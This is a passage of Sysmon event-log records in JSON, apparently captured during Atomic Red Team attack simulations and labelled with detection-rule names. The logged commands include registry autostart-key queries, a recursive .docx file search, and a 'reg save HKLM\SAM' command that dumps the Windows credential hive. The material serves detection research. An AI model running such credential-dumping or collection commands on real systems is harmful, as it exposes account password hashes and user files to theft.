(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ParentProcessId":1740,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010C86B3100","ProcessId":644,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.931"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3702,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.937862Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ProcessId":4220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.956"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3703,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.975133Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010056E3100","ParentProcessId":4220,"ProcessGuid":"747F3D96-D87C-5D31-0000-001057703100","ProcessId":6620,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:32.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3704,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.990533Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ProcessId":196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.019"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3705,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.036329Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-001090723100","ParentProcessId":196,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010E2743100","ProcessId":3172,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3706,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.059631Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ProcessId":2148,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.113"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3707,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.147861Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00102B773100","ParentProcessId":2148,"ProcessGuid":"747F3D96-D87D-5D31-0000-00107D793100","ProcessId":1472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3708,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.175813Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ProcessId":3616,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3709,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.225776Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010B37B3100","ParentProcessId":3616,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010057E3100","ProcessId":1340,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3710,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.251689Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-00103B803100","ParentProcessId":324,"ProcessGuid":"747F3D96-D87D-5D31-0000-00108D823100","ProcessId":1224,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3712,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.331942Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010CA843100","ParentProcessId":3900,"ProcessGuid":"747F3D96-D87D-5D31-0000-00101C873100","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.383"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3714,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.392501Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ProcessId":3868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.541"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3715,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.559318Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg Query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87D-5D31-0000-0010FA8A3100","ParentProcessId":3868,"ProcessGuid":"747F3D96-D87D-5D31-0000-00104C8D3100","ProcessId":6536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:33.568"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3716,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:33.572021Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D885-5D31-0000-00107F1A3200","ProcessId":2832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:41.646"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3721,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:41.660271Z"}},"Version":5}}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D88F-5D31-0000-0010BD353200","ProcessId":2780,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:51.971"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3724,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:51.996250Z"}},"Version":5}}}},{"detection":["Automated Collection Command Prompt"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 